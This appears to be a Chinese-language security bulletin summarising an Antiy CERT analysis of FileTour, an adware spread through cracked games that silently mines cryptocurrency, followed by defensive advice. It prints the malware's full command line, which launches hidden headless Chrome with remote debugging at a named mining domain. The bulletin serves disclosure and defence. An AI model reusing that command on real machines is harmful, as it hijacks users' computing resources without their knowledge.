137期报告汇总
安天发布《FileTour 恶意广告软件分析报告》
 
     近日,安天 CERT 在梳理网络安全事 件时发现一款伪装正常页面并在后台静默 挖矿的广告软件 FileTour。

     FileTour 是一种广告软件,通常作为 游戏和其他软件的破解或欺骗手段进行传 播。它被认为是介于广告软件和 PUP 以 及更危险的计算机恶意代码(如密码窃取 木马和挖矿木马)之间的一款软件而臭 名昭著。此广告件运行后设置自启动, 当用户登录到 Windows 时,它会自动启 动 Chrome 并连接到浏览器内的挖矿页 面,它是以一种让用户看不到 Chrome 的 方式来实现的。用户登录 Windows 时用 于 启 动 Chrome 的 命 令 是:“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disablegpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41. html?t=0.4”。该命令将导致 Chrome 以不 可见的无头状态打开,无需 GPU 硬件加 速即可以在端口 9222 上启用远程调试,并 自动连接到“https://de-mi-nis-ner2.info/ cdn-41.html?t=0.4”。当浏览器在后台打 开此页面时,它将执行嵌入式 JavaScript, 以启动挖矿脚本,导致 Chrome 在任务管 理器中达到 70-80%的 CPU 利用率,这 都是因为它会在后台静默挖矿。大多数人 甚至不会注意到他们感染了恶意代码。他 们可能会感觉电脑变慢,有些人可能会检 查任务管理器,并注意到 Chrome 的奇怪行为,但对于大多数用户而言,该挖矿脚 本可以运行很长时间而不被检测到。

     安天 CERT 提醒广大网络使用者,可 以在 Chrome 中使用 adblocker 插件,这会 阻止浏览器内的挖矿脚本。要提高网络安 全意识,在日常工作中要及时进行系统更 新和漏洞修复,不要随意下载非正版的应 用软件、非官方游戏、注册机等。收发邮 件时要确认收发来源是否可靠,更加不要 随意点击或者复制邮件中的网址,不要轻 易下载来源不明的附件,发现网络异常要 提高警惕并及时采取应对措施,养成及时 更新操作系统和软件应用的好习惯。

     目前,安天追影产品已经实现了对该 类恶意代码的检出。